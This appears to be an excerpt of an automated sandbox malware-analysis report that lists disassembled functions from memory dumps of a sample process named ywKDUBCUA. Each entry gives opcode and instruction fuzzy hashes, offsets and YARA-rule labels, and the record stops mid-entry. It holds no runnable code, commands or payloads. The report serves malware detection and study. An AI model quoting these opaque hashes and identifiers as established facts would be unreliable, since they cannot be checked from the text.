                                              • Instruction ID: 8106c6c3d992b0e8f678406aae367de5890a457dcb9b1d9f00a75c2efbc47cfb
                                              • Opcode Fuzzy Hash: 47e8058dc7c3f02d9ef563d9d8a9d1a15a73a191e4bd622f1e6d71dfab52c1e0
                                              • Instruction Fuzzy Hash: 0E11F3B5C0065A9BCB10CF9AC944BDEFBF8FF48320F14816AD918A7241D778A945CFA5
                                              Function 00F2F3C5 Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.3266835259.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_f20000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: PHcq
                                              • API String ID: 0-4245845256
                                              • Opcode ID: 1a2a91eba5e237430b51aded464aa8c8add4529fbf2b6d9e764a6817dcec7526
                                              • Instruction ID: e67c7c5e13089a8cf9cb3be1703007ddf362b02bb1d15539014a0e07353b0e4c
                                              • Opcode Fuzzy Hash: 1a2a91eba5e237430b51aded464aa8c8add4529fbf2b6d9e764a6817dcec7526
                                              • Instruction Fuzzy Hash: 6A41BD31B002158FCB06AB34E9547AF7BB2EF89310B284578D406DB392DE34DD4ADBA5
                                              Function 00F27010 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.3266835259.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_f20000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: LRcq
                                              • API String ID: 0-4134321033
                                              • Opcode ID: 0d08b1859df32e05b31363d757cfe9351849b6e8fa02141ad9295c9ff99e703a
                                              • Instruction ID: 9aada95013997ed21404d4ef9c32754676d8d2dc65e189b5c8515b0f398b0908
                                              • Opcode Fuzzy Hash: 0d08b1859df32e05b31363d757cfe9351849b6e8fa02141ad9295c9ff99e703a
                                              • Instruction Fuzzy Hash: 7C317031E04329DBDB14DFA5E4407AEB7B6FF85310F208569E905EB280DB71AD45CB51
                                              Function 00F26FFF Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.3266835259.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_f20000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: LRcq
                                              • API String ID: 0-4134321033
                                              • Opcode ID: 0d56cbb20a2aa4187ca5885f256c9d34bc1c764fbe70f787b275868619ad3c28
                                              • Instruction ID: 49bbb13aa169bf2808c087924e7d0f8d79daf69f63a1435bd86d39f34875b4f7
                                              • Opcode Fuzzy Hash: 0d56cbb20a2aa4187ca5885f256c9d34bc1c764fbe70f787b275868619ad3c28
                                              • Instruction Fuzzy Hash: 31318D30E043298FDB15DF68D8957AEB7B2EF86310F208469E801FB290DB719D46DB51
                                              Function 00F26B69 Relevance: 1.3, Strings: 1, Instructions: 69COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.3266835259.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_f20000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: LRcq
                                              • API String ID: 0-4134321033
                                              • Opcode ID: d06925a97962fd527e39f704d8dcc9125acb6100c1612a1575201c2835b57cdd
                                              • Instruction ID: 18d6f19ceac8084db61ac7b745becb511fa5b46b32aeb1532a37ece8d6cbb97c
                                              • Opcode Fuzzy Hash: d06925a97962fd527e39f704d8dcc9125acb6100c1612a1575201c2835b57cdd
                                              • Instruction Fuzzy Hash: 3621C3307082504FC745FB38E4657AE7BE2EF86710F1484EAE045CB29AEE799C49C791
                                              Function 00F279B2 Relevance: .6, Instructions: 553COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.3266835259.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_f20000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 898738724db5e11ac0231b49e8599349b7ca7fc53b84ab924ca6b188b5bc9b73
                                              • Instruction ID: 317b33ac5df8dffd90f11dba9b6b8bece3666c9541b9c7d3c9e83f0c34a7a47d
                                              • Opcode Fuzzy Hash: 898738724db5e11ac0231b49e8599349b7ca7fc53b84ab924ca6b188b5bc9b73
                                              • Instruction Fuzzy Hash: 89127C30B006068BCB96AB38E49432D37E6EF89354F644D39E106CB795DF35EC869B91
                                              Function 00F2940C Relevance: .4, Instructions: 387COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.3266835259.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_f20000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8e8960d91f73521314ee67e462fcba544b8a2907a6e507390eaf5cfc450f5cff
                                              • Instruction ID: a9aee4542f298ff68a551a20963e673bfa0db10d4b3c33d902b81b0756cd948e
                                              • Opcode Fuzzy Hash: 8e8960d91f73521314ee67e462fcba544b8a2907a6e507390eaf5cfc450f5cff
                                              • Instruction Fuzzy Hash: 84E17E35E042159FCB15DF68E584AAEBBF2EF89320F248469E806D7395DB74DC42DB80
                                              Function 00F29788 Relevance: .3, Instructions: 280COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.3266835259.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_f20000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 986b2094780234f544974769eb12851bee1f0268da20884a37f9643c35c533c0
                                              • Instruction ID: a1b0acc9e1f98dece7186c8150a8e84acb6573bcdff00a54f9fa1e088a18537d
                                              • Opcode Fuzzy Hash: 986b2094780234f544974769eb12851bee1f0268da20884a37f9643c35c533c0
                                              • Instruction Fuzzy Hash: 95A1A931E042158FDB10CFA8E9807AEBBB1EF85320F64856AE909DB395D774DC45CB91
                                              Function 00F24A5E Relevance: .3, Instructions: 262COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.3266835259.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_f20000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6c834ce57b89d6afcca995e1b9ecf0e207d91240e12548dc6058255ff2c8a074
                                              • Instruction ID: 6575a8c3a996d63ce759633115746e243d51ab19f2c3eee7d7f012a6bd4221fa
                                              • Opcode Fuzzy Hash: 6c834ce57b89d6afcca995e1b9ecf0e207d91240e12548dc6058255ff2c8a074
                                              • Instruction Fuzzy Hash: 07B14E71E002299FDF10CFA8E9857DDBBF1BF88324F148129D814A7294EBB4A845DB81
                                              Function 00F23E46 Relevance: .2, Instructions: 233COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.3266835259.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_f20000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5c6bf386fe85cb862bd499aebc0faa5b8ed15359a1927acffaa9b0cd3156f153
                                              • Instruction ID: 8db1c5b80d5f0948822982e87faaf5b599222df98263aae927bcaee185efceaa
                                              • Opcode Fuzzy Hash: 5c6bf386fe85cb862bd499aebc0faa5b8ed15359a1927acffaa9b0cd3156f153
                                              • Instruction Fuzzy Hash: 02917DB0E00219DFDF14CFA8E9857DDBBF2EF88314F148129E419A7254EB789985DB81
                                              Function 00F2112A Relevance: .1, Instructions: 133COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.3266835259.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_f20000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6e69e3b60b5c9f19b2367f285214b013ddeb66c1f84c8a6a63293f5463ee7a61
                                              • Instruction ID: 695de9102daea17c588d320aace6416c8bda0797a00800a4f6148ecd69fa745d
                                              • Opcode Fuzzy Hash: 6e69e3b60b5c9f19b2367f285214b013ddeb66c1f84c8a6a63293f5463ee7a61
                                              • Instruction Fuzzy Hash: C9513031145285CFC70AFB68FC91B593F6AFB52304B548EA9D144CB27AE7306D89CBA0
                                              Function 00F26CB0 Relevance: .1, Instructions: 132COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.3266835259.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_f20000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7de46fb471e5ef3668a9ff49298feb57c2b2a091f0f4ba0fea7d6f46fed92d06
                                              • Instruction ID: 3a8e841b48fb57e8006cec1c9eed1223832181831f9838bb53d9fa7a9a30537c
                                              • Opcode Fuzzy Hash: 7de46fb471e5ef3668a9ff49298feb57c2b2a091f0f4ba0fea7d6f46fed92d06
                                              • Instruction Fuzzy Hash: 2D5144B5E002288FDB14CFA9D885B9DBBB1FF48310F548129E815BB3A5C774A844DF95
                                              Function 00F26CA5 Relevance: .1, Instructions: 132COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.3266835259.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_f20000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7b0307c8fbf227a36000b5abb6b3371672e01e6500732bec90dda5111f422e37
                                              • Instruction ID: 1fc18e1ea1dbefa3d9520159007d3da1a4bfd8dc8ee8420ac0bcefcc54fdb60f
                                              • Opcode Fuzzy Hash: 7b0307c8fbf227a36000b5abb6b3371672e01e6500732bec90dda5111f422e37
                                              • Instruction Fuzzy Hash: 3D5155B4E002288FDB14CFA9D885BEDBBB1FF48310F548129E815AB365D7749844CF95
                                              Function 00F2133F Relevance: .1, Instructions: 102COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.3266835259.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_f20000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d1f82f50b35781d512734c0d76644cb51a9e28321fbae5053ac8649d0f27484d
                                              • Instruction ID: 4b748b3d1d88f3afe463d863af9fa4ec67a67f23dbfa5e0a841825476eb3c724
                                              • Opcode Fuzzy Hash: d1f82f50b35781d512734c0d76644cb51a9e28321fbae5053ac8649d0f27484d
                                              • Instruction Fuzzy Hash: 51314C30E041908FDB66E774F8487AD3BA1FF23325F1408AEE50AC7281E6299C49C719
                                              Function 00F21138 Relevance: .1, Instructions: 100COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.3266835259.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_f20000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 25346f61cc53fe992c68835c0e6d215409ad9a9351c4bc4bfb7860530b242880
                                              • Instruction ID: 36be289f34632e42bb6e5f1edcf9674eb113b00628fd2ff5c8f16d8fdbdc8ff6
                                              • Opcode Fuzzy Hash: 25346f61cc53fe992c68835c0e6d215409ad9a9351c4bc4bfb7860530b242880
                                              • Instruction Fuzzy Hash: ED41BF71151181CFC70AFB68FC91B593B69FB55304B448E69D114C723AFB706D89CBA0
                                              Function 00F2F288 Relevance: .1, Instructions: 95COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.3266835259.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_f20000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f6e1891686c8d3a2ae3f5731ef711fa7baaec1980af01f7e7aeec1a3b8839dc5
                                              • Instruction ID: abcb13067597c7b352fe7619614391abd6c60d2c40ddc390ee82ed1c8f6053c7
                                              • Opcode Fuzzy Hash: f6e1891686c8d3a2ae3f5731ef711fa7baaec1980af01f7e7aeec1a3b8839dc5
                                              • Instruction Fuzzy Hash: D1314D31E106569BCB19CFA9D9546AEB7B2AF89310F108929E806E7394DF70EC46CB50
                                              Function 00F226AC Relevance: .1, Instructions: 95COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.3266835259.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_f20000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b5960f156cb0b6e42cf557bfc960c7074b367a2099307ef5e503d032eddf4224
                                              • Instruction ID: 74d236fcd65e00f72cd0cfe6399935a2863bc96643612be804384b3af6a5cee4
                                              • Opcode Fuzzy Hash: b5960f156cb0b6e42cf557bfc960c7074b367a2099307ef5e503d032eddf4224
                                              • Instruction Fuzzy Hash: FB41F0B0D00359AFCB10CFA9C884ADEBFF5EF48314F248029E819AB254DB759946DF90
                                              Function 00F2F298 Relevance: .1, Instructions: 91COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.3266835259.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_f20000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 228f8c5d78f817db875d1b518eaa4ac0365f3c72e78bc8f05c7ceeb212f542db
                                              • Instruction ID: e0a4cfe7296cb06445116b9333c11057934d81da2cf7b672119bebde3968aae9
                                              • Opcode Fuzzy Hash: 228f8c5d78f817db875d1b518eaa4ac0365f3c72e78bc8f05c7ceeb212f542db
                                              • Instruction Fuzzy Hash: 69314E31E106159BCB19DFA9D954A9EB7B2EF89310F108939E806E7394DF70EC46CB50
                                              Function 00F25068 Relevance: .1, Instructions: 90COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.3266835259.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_f20000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6ff9d52fb6cb9c322bae5535e3243c36b8f7abe83986f5b5ea709d800e75c2f8
                                              • Instruction ID: 3381ca55ccf65fcdac75abbe631221faf401793623d16fbc3478074d3ddb69f3
                                              • Opcode Fuzzy Hash: 6ff9d52fb6cb9c322bae5535e3243c36b8f7abe83986f5b5ea709d800e75c2f8
                                              • Instruction Fuzzy Hash: B1318D34A00625CFDB18EB78E9507AD77B6BF89744F200468D402EB3A4DB36CC42DBA5
                                              Function 00F226B8 Relevance: .1, Instructions: 90COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.3266835259.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_f20000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d387564d26cc3f1d3246e349a960679de17a8ca8e07b18eaee566c7b8d048f6e
                                              • Instruction ID: a32dfc824cef51807762e47f33333b56a4b050349f7e43cd884a0cf5cde5a806
                                              • Opcode Fuzzy Hash: d387564d26cc3f1d3246e349a960679de17a8ca8e07b18eaee566c7b8d048f6e
                                              • Instruction Fuzzy Hash: 3C41EFB1D00349AFDB10DF99C884ADEBFF5EF48314F248029E819AB254DB75A945DF90
                                              Function 00F25078 Relevance: .1, Instructions: 89COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.3266835259.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_f20000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b598d6d1b603642a570516d1106fbcd8ca79b7035d57de40dfee7ca487a7708d
                                              • Instruction ID: 8ea7f805e2f93b81f0f0f6c9bc0a9a3e30a9f2c1e0ef2a77528c6fe7267bc7a1
                                              • Opcode Fuzzy Hash: b598d6d1b603642a570516d1106fbcd8ca79b7035d57de40dfee7ca487a7708d
                                              • Instruction Fuzzy Hash: 1D316D34B00625CBDB14EB74E9107AE77B6AF88744F100468D402EB3A4DB36DC41DBA5
                                              Function 00F292F8 Relevance: .1, Instructions: 85COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.3266835259.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_f20000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 27f277e11d368d42e075792c94302f1d8d700c2a68f3e3a7ad9534998453a5ad
                                              • Instruction ID: 0f8af19c9fa52e206563fadf1493e7b020acdd7c8fab0538431d9395cfc5dbb9
                                              • Opcode Fuzzy Hash: 27f277e11d368d42e075792c94302f1d8d700c2a68f3e3a7ad9534998453a5ad
                                              • Instruction Fuzzy Hash: B1319F31E042569FDB09CFA4D49069EB7B6FF99310F148519E805AB391DBB1DC42CB50
                                              Function 00F21672 Relevance: .1, Instructions: 83COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.3266835259.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_f20000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 60b02d0b2385d425395e3a6d903d9ff05bdee6853e30f5012320a0502a02ac91
                                              • Instruction ID: 6fb8a60e3bce38fde27dde6c55215f2b7383daf67225ec386e3f3a3ebf7f9d77
                                              • Opcode Fuzzy Hash: 60b02d0b2385d425395e3a6d903d9ff05bdee6853e30f5012320a0502a02ac91
                                              • Instruction Fuzzy Hash: 1C21D874A001614FDB62BB78F8847BD3B65FBA1320F144E21E006CB25AFA24DC89DB95
                                              Function 00F21790 Relevance: .1, Instructions: 82COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.3266835259.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_f20000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: dfaaea16b74e5111023c2e9a56e3c1a1403e448bfc3fdd1a93d6d5df0416ce53
                                              • Instruction ID: 488186d1331acf07af99000e1ff53959a64aab23d9996e0823201dff120041ad
                                              • Opcode Fuzzy Hash: dfaaea16b74e5111023c2e9a56e3c1a1403e448bfc3fdd1a93d6d5df0416ce53
                                              • Instruction Fuzzy Hash: 2721C575F012205FCFA1AB78A8487AE3BA5FB98360F140925EA49C3305EA34CC529B95
                                              Function 00F2FF28 Relevance: .1, Instructions: 82COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.3266835259.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_f20000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 469d4d872f19b55c3d5aca8422f896757c5b34e35472a2fcda6aa111ae5240c8
                                              • Instruction ID: f77e0a0a8c1aa85c4b52c01ac505f295dfdc471816668e6cc62662b5fbc4eff7
                                              • Opcode Fuzzy Hash: 469d4d872f19b55c3d5aca8422f896757c5b34e35472a2fcda6aa111ae5240c8
                                              • Instruction Fuzzy Hash: F801F532F106255FCB6A2778542813E66E7EFCA310B14447A9A4ACB3D4EE30CD069392
                                              Function 00F21457 Relevance: .1, Instructions: 80COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.3266835259.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_f20000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e136cd4777d8ce5ab2afa1e1a2333438b2503e1cabd17a9729aef81104ba0bbc
                                              • Instruction ID: 8ddba2e031f09ce0957c30dfe4d871014e1f4a65ee3d1b2e41d189ecf9325c01
                                              • Opcode Fuzzy Hash: e136cd4777d8ce5ab2afa1e1a2333438b2503e1cabd17a9729aef81104ba0bbc
                                              • Instruction Fuzzy Hash: 4A216531E042258FCB71EBB4A8552AE7BE5EF56320F1404BAE809D7242DB35CD419795
                                              Function 00C7D005 Relevance: .1, Instructions: 78COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.3266267840.0000000000C7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C7D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_c7d000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e3859d2bb11ddccf1ca5b1bd9f5d9000436e41966f956ae2c5ee684d307b3690
                                              • Instruction ID: b143056c1ec1a3ab26eb95a64cb9cb92863ca6496b21c1151c92940a9931a402
                                              • Opcode Fuzzy Hash: e3859d2bb11ddccf1ca5b1bd9f5d9000436e41966f956ae2c5ee684d307b3690
                                              • Instruction Fuzzy Hash: B731597550D3C49FCB138B24C990711BF71AF46214F29C5EBD8898B2A3C23A980ACB62
                                              Function 00F29308 Relevance: .1, Instructions: 78COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.3266835259.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_f20000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 17e9d235971409e34c6aa85288e4e54938fa76fd49a062b55ef93218eccb2d4f
                                              • Instruction ID: 4b21c142d2c48222bf0e989026aeef94178c14e3e3b2453d8dfb8843a49efd11
                                              • Opcode Fuzzy Hash: 17e9d235971409e34c6aa85288e4e54938fa76fd49a062b55ef93218eccb2d4f
                                              • Instruction Fuzzy Hash: 02218031E0421A9BCB19CFA9D490A9EF7B6FF85310F108519E805EB280DBB1DC86CB90
                                              Function 00F29AD2 Relevance: .1, Instructions: 75COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.3266835259.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_f20000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3462975c3b80097a3dcd909621fb7a823b84cc973bc4b7ae6b2ca6388e7b4417
                                              • Instruction ID: 8479051ced873c7c9f838fceadb31c4cd6f6a471a56723cb73255631e5b4b11e
                                              • Opcode Fuzzy Hash: 3462975c3b80097a3dcd909621fb7a823b84cc973bc4b7ae6b2ca6388e7b4417
                                              • Instruction Fuzzy Hash: 0121B371B141148FEB14DB78E895BAE7BF6EFC8720F208169E405EB3A1DAB58D00DB50
                                              Function 00F291F8 Relevance: .1, Instructions: 74COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.3266835259.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_f20000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e5c52bed2eebf58c6c09b994c616f6dce56bc2f15312404158d73233e24d1992
                                              • Instruction ID: 3c71d020dc86ed70a2746607eaaae85ebc4e8b013d31c1b8fe34154325358e6f
                                              • Opcode Fuzzy Hash: e5c52bed2eebf58c6c09b994c616f6dce56bc2f15312404158d73233e24d1992
                                              • Instruction Fuzzy Hash: 9221B331E04215EBCB09CFA4D9506DEB7B6FF99310F20852AE815BB391DBB0AC45CB50
                                              Function 00C7D030 Relevance: .1, Instructions: 72COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.3266267840.0000000000C7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C7D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_c7d000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e83067fdb752d18d0c53128496e0c782cd6c4d9ee7da64a138b7e41fbcf9b217
                                              • Instruction ID: 84ad32b962d47f38609e79f1f00d762c32e16a21daf95712a4f51665fc8e78e5
                                              • Opcode Fuzzy Hash: e83067fdb752d18d0c53128496e0c782cd6c4d9ee7da64a138b7e41fbcf9b217
                                              • Instruction Fuzzy Hash: 4421F271504204DFCB15DF14D980B26BBB5FF84324F24C56DD80E4B296C33AD846CA62
                                              Function 00F21848 Relevance: .1, Instructions: 71COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.3266835259.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_f20000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4881103dd417164f6bf0bab193ca6261ca49b328bd71f067778903c78603a39c
                                              • Instruction ID: 121b93e831c363a1d1e3665b3ad70f188d4ea259ccbfbade70960853fe7a0021
                                              • Opcode Fuzzy Hash: 4881103dd417164f6bf0bab193ca6261ca49b328bd71f067778903c78603a39c
                                              • Instruction Fuzzy Hash: 20217C34A00264CFDB25EB78D5647EE77F2BF69354F200468D446EB260DB368C41EBA9
                                              Function 00F29208 Relevance: .1, Instructions: 70COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.3266835259.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_f20000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ee24836d0bae408ae8eef95c94406454e7eb5a36795b6b1cae2f48407aea8538
                                              • Instruction ID: da4e3ab397879eb410b6dabd7cec643e645d237c287dee33f70f7bed7207dcc4
                                              • Opcode Fuzzy Hash: ee24836d0bae408ae8eef95c94406454e7eb5a36795b6b1cae2f48407aea8538
                                              • Instruction Fuzzy Hash: 9D216531E04215EBCB19CFA5D55069EB7B6BF99310F20851AE815F7390DBB0AC45CB50
                                              Function 00F21858 Relevance: .1, Instructions: 70COMMON
                                              Download Yara Rule
                                              Memory Dump Source
